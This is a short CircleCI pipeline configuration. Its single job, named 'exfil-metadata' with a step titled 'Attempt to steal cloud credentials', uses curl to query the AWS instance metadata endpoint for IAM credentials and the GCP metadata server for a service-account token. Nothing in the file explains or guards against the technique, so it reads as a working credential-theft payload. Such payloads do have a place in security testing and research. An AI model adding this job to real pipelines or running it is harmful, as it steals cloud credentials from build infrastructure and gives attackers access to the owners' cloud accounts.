version: 2.1

jobs:
  exfil-metadata:
    machine:
      image: ubuntu-2004:current
    steps:
      - run:
          name: "Attempt to steal cloud credentials"
          command: |
            echo ">>> Probing for AWS Metadata Service..."
            curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
            echo
            echo ">>> Probing for GCP Metadata Service..."
            curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

workflows:
  main_workflow:
    jobs:
      - exfil-metadata
